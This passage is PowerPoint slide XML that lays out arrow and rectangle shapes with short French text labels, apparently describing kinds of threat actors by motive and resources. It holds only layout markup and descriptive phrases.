                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8670A2C-22AF-4803-A4BF-C86D9DDD9B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1881759"/>
            <a:ext cx="5930089" cy="1294485"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1303498"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27FF3C3-BC40-491E-957F-F55ECC00D530}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4632B53E-7C15-4F14-8202-9C500EBF9260}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1615009"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584BF60F-2284-4AAE-A915-8056B5AE1DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202328" y="2693555"/>
            <a:ext cx="3586034" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Opportuniste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> et avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>peu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ressources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BBCA92-8E60-4A66-8896-56C246764BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7732524" y="2693555"/>
            <a:ext cx="4302650" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intérêts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> financiers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>faibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>moyens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CF9227-E968-483B-B771-E3016759C3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="0" y="5556034"/>
            <a:ext cx="5930089" cy="1294485"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1303498"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D0C6CE-0496-49E7-B3CB-12C4FED7294B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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20" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71935EB4-83B4-4280-990B-2EF4E9E6C3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1615009"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967A3851-D55E-4BD0-86A8-B58D19391E0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="6273311" y="5563515"/>
            <a:ext cx="5930089" cy="1294485"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1303498"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9295E1A9-6122-45A8-8DF6-3454A7E9B71F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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23" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284A3967-46D0-4B25-B3A2-162701810CB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1615009"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F55D051-039E-4161-8196-D52352D165C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534544" y="5283692"/>
            <a:ext cx="4501012" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intérêts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> politiques et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>économiques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> et avec des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>moyens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
